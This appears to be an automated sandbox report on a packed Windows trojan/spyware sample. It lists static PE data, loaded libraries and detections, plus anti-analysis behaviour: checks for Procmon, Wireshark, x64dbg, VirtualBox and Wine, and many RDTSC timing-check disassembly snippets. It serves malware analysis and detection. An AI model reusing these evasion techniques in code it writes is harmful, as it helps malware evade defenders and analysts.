Source: QMtCX5RLOP.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: QMtCX5RLOP.exeStatic PE information: Section: omzymeri ZLIB complexity 0.9944679890996603
Source: QMtCX5RLOP.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@8/2
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_2_00D4255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D4255D
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_2_00D431D7 CreateToolhelp32Snapshot,CloseHandle,0_2_00D431D7
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: QMtCX5RLOP.exeVirustotal: Detection: 45%
Source: QMtCX5RLOP.exeReversingLabs: Detection: 57%
Source: QMtCX5RLOP.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: QMtCX5RLOP.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeSection loaded: kernel.appcore.dllJump to behavior
Source: QMtCX5RLOP.exeStatic file information: File size 4480512 > 1048576
Source: QMtCX5RLOP.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: QMtCX5RLOP.exeStatic PE information: Raw size of omzymeri is bigger than: 0x100000 < 0x1b9800

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeUnpacked PE file: 0.2.QMtCX5RLOP.exe.d40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;omzymeri:EW;rconqxqs:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;omzymeri:EW;rconqxqs:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: QMtCX5RLOP.exeStatic PE information: real checksum: 0x454fe3 should be: 0x44962b
Source: QMtCX5RLOP.exeStatic PE information: section name:
Source: QMtCX5RLOP.exeStatic PE information: section name: .idata
Source: QMtCX5RLOP.exeStatic PE information: section name:
Source: QMtCX5RLOP.exeStatic PE information: section name: omzymeri
Source: QMtCX5RLOP.exeStatic PE information: section name: rconqxqs
Source: QMtCX5RLOP.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_008780C8 push eax; retf 0_3_008780C9
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889BB5 push ds; iretd 0_3_00889BB8
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_3_00889548 push eax; iretd 0_3_00889605
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_2_010C41D0 push eax; mov dword ptr [esp], edx0_2_010C41D5
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_2_00DA1430 push eax; mov dword ptr [esp], 00000000h0_2_00DA1433
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_2_00DFC7F0 push eax; mov dword ptr [esp], 00000000h0_2_00DFC743
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_2_00DC39A0 push eax; mov dword ptr [esp], 00000000h0_2_00DC39A3
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeCode function: 0_2_00D80AC0 push eax; mov dword ptr [esp], 00000000h0_2_00D80AC4
Source: QMtCX5RLOP.exeStatic PE information: section name: omzymeri entropy: 7.954409366201115

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: QMtCX5RLOP.exe, 00000000.00000003.1695888005.0000000007100000.00000004.00001000.00020000.00000000.sdmp, QMtCX5RLOP.exe, 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1421FFD second address: 1422016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 14217F8 second address: 14217FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1594134 second address: 159413A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 159413A second address: 159413E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 159339F second address: 15933A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15933A3 second address: 15933B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F9D00F1DB5Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15933B8 second address: 15933BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15933BE second address: 15933CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D00F1DB5Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15936F7 second address: 1593705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1593705 second address: 1593710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15939E6 second address: 15939EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15939EC second address: 15939F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15939F0 second address: 15939F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1596788 second address: 15967BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F9D00F1DB5Fh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9D00F1DB68h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15967BC second address: 14217F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F9D01181AAAh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 jns 00007F9D01181AA8h 0x0000001b jmp 00007F9D01181AB2h 0x00000020 popad 0x00000021 pop eax 0x00000022 jmp 00007F9D01181AB6h 0x00000027 push dword ptr [ebp+122D1451h] 0x0000002d xor dword ptr [ebp+122D1C39h], eax 0x00000033 call dword ptr [ebp+122D1CF5h] 0x00000039 pushad 0x0000003a jmp 00007F9D01181AACh 0x0000003f xor eax, eax 0x00000041 xor dword ptr [ebp+122D1B08h], ebx 0x00000047 mov edx, dword ptr [esp+28h] 0x0000004b mov dword ptr [ebp+122D1C26h], ebx 0x00000051 mov dword ptr [ebp+122D2847h], eax 0x00000057 cmc 0x00000058 mov esi, 0000003Ch 0x0000005d clc 0x0000005e add esi, dword ptr [esp+24h] 0x00000062 cld 0x00000063 lodsw 0x00000065 jmp 00007F9D01181AAFh 0x0000006a jmp 00007F9D01181AABh 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 clc 0x00000074 mov ebx, dword ptr [esp+24h] 0x00000078 ja 00007F9D01181AACh 0x0000007e pushad 0x0000007f or dword ptr [ebp+122D2271h], eax 0x00000085 mov edi, dword ptr [ebp+122D27F3h] 0x0000008b popad 0x0000008c push eax 0x0000008d pushad 0x0000008e push eax 0x0000008f push edx 0x00000090 push ebx 0x00000091 pop ebx 0x00000092 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15968FF second address: 1596905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1596905 second address: 1596934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F9D01181AB4h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F9D01181AACh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1596934 second address: 1596938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1596938 second address: 159693E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 159693E second address: 1596945 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1596945 second address: 1596954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1596954 second address: 159695A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 159695A second address: 1596960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1596960 second address: 1596964 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1596964 second address: 1596987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007F9D01181AB5h 0x00000014 jmp 00007F9D01181AAFh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1596987 second address: 159698D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 159698D second address: 1596991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1596B59 second address: 1596BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9D00F1DB61h 0x00000009 popad 0x0000000a jl 00007F9D00F1DB58h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 push ecx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a pop eax 0x0000001b popad 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007F9D00F1DB63h 0x0000002a popad 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 popad 0x00000032 pop eax 0x00000033 or edi, dword ptr [ebp+122D287Fh] 0x00000039 lea ebx, dword ptr [ebp+124486BCh] 0x0000003f mov edi, dword ptr [ebp+122D2AE7h] 0x00000045 push eax 0x00000046 pushad 0x00000047 jmp 00007F9D00F1DB64h 0x0000004c jl 00007F9D00F1DB5Ch 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 1596C8A second address: 1596D2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 065E465Bh 0x00000010 pushad 0x00000011 call 00007F9D01181AB2h 0x00000016 mov eax, 0C80C1C1h 0x0000001b pop esi 0x0000001c push edi 0x0000001d pop eax 0x0000001e popad 0x0000001f push 00000003h 0x00000021 push 00000000h 0x00000023 jmp 00007F9D01181AB7h 0x00000028 push 00000003h 0x0000002a mov dword ptr [ebp+122D20DAh], ecx 0x00000030 push ABAE0219h 0x00000035 jno 00007F9D01181AB0h 0x0000003b add dword ptr [esp], 1451FDE7h 0x00000042 push 00000000h 0x00000044 push ebp 0x00000045 call 00007F9D01181AA8h 0x0000004a pop ebp 0x0000004b mov dword ptr [esp+04h], ebp 0x0000004f add dword ptr [esp+04h], 0000001Ah 0x00000057 inc ebp 0x00000058 push ebp 0x00000059 ret 0x0000005a pop ebp 0x0000005b ret 0x0000005c lea ebx, dword ptr [ebp+124486C7h] 0x00000062 mov esi, edx 0x00000064 xchg eax, ebx 0x00000065 push eax 0x00000066 push edx 0x00000067 push edi 0x00000068 pushad 0x00000069 popad 0x0000006a pop edi 0x0000006b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15B60A0 second address: 15B60A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15B60A9 second address: 15B60AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15B6626 second address: 15B662C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15B67BB second address: 15B67C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15B68F5 second address: 15B6908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F9D00F1DB5Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15B6908 second address: 15B690E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15B690E second address: 15B6936 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9D00F1DB67h 0x0000000c je 00007F9D00F1DB56h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15B6E58 second address: 15B6E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9D01181AB5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15B79F0 second address: 15B79F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15B79F4 second address: 15B7A08 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9D01181AB0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15B7B9D second address: 15B7BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15BD258 second address: 15BD262 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9D01181AACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15BD262 second address: 15BD26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\QMtCX5RLOP.exeRDTSC instruction interceptor: First address: 15C2E97 second address: 15C2EDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F9D01181AB3h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edi 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 popad 0x00000019 pushad 0x0000001a jc 00007F9D01181AA6h 0x00000020 jmp 00007F9D01181AB5h 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
